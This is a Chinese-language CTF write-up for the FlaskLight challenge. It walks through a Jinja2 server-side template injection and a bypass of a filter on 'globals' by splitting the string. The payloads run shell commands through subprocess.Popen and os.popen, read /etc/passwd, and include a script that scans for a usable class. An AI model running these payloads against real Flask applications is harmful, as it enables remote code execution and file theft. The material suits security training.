[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤
目录
subprocess.Popen
FILE
warnings.catch_warnings
site._Printer
这题很明显就是 SSTI了
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第1张图片](http://img.e-com-net.com/image/info8/35972822a5d2456ebd09f2fdf3f9f492.png)
源代码
我们试试看
{{7*7}}
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第2张图片](http://img.e-com-net.com/image/info8/5f8728a6821c418d93fe373f6fffc840.png)
然后我们就开始吧
原本我的想法是直接{{url_for.__globals__}}
但是回显是直接500 猜测过滤 我们正常来吧
{{"".__class__}} 查看当前情况
{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码
{{"".__class__.__mro__}} 查看全部类 发现存在了
{{"".__class__.__mro__[2].__subclasses__()}} 查看object的子类 ![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第3张图片](http://img.e-com-net.com/image/info8/6f66bb7221b8425a98f06faa99f686cb.jpg)
这里我们需要 os 来调用
但是这里存在一个类 可以不需要os
subprocess.Popen
Python3 subprocess | 菜鸟教程
需要参数
("命令",shell=True,stdout=-1)
这里 stdout 就是指定输出 PIPE然后我们可以使用 其方法来进行交互
("命令",shell=True,stdout=-1).communicate()这样我们就可以实现rce
首先通过 脚本跑出来其的位数
import time
import requests
base_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="
for i in range(300):
payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%i
r = requests.get(url=base_url + payload)
if "subprocess.Popen" in r.text:
print(i)
if r.status_code == 429:
time.sleep(0.5)跑出来是258
我们开始构造
?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}
最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符
我们看看 flasklight看看
?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}FILE
这是另一个方法 通过file读取文件
首先我们要测试一下
先查找一下 file
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第4张图片](http://img.e-com-net.com/image/info8/ceb90538840b44aba88da7b068f3059a.jpg)
发现是40
然后我们看看
{{"".__class__.__mro__[2].__subclasses__()[40]}}/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第5张图片](http://img.e-com-net.com/image/info8/56eac950d948452a94da8a172bf1ff74.jpg)
读取成功
然后我们去读一下命令行吧
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第6张图片](http://img.e-com-net.com/image/info8/053de92e16e14aa8a1cdc812d6f0d38b.png)
发现读出了路径
我们看看这个py
但是还是没有办法直接读取出来 因为不知道flag的文件名字
warnings.catch_warnings
我们首先找一下这个类的位数
59
{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}这里就卡住了 因为我们还是需要 globals的参与
我们如何绕过过滤呢
{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}这样就可以
我们在上面也知道 是通过匹配过滤的
做到这个我们其实就可以正常rce了 但是还是完善一下这个类的用法吧
这里我们能发现 这个类没有加载 os 需要我们手动加载
我们需要在其
['__builtins__']['eval']下导入
payload
?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}这样就借助 os 实现了 rce
site._Printer
我们知道了 globals可以拼接绕过
这个方法也可以实现我们看看里面是否内置了 os
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤_第7张图片](http://img.e-com-net.com/image/info8/5f083cd1d50d486f91365c489d2824d8.png)
发现存在 我们直接rce即可
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
最后读取即可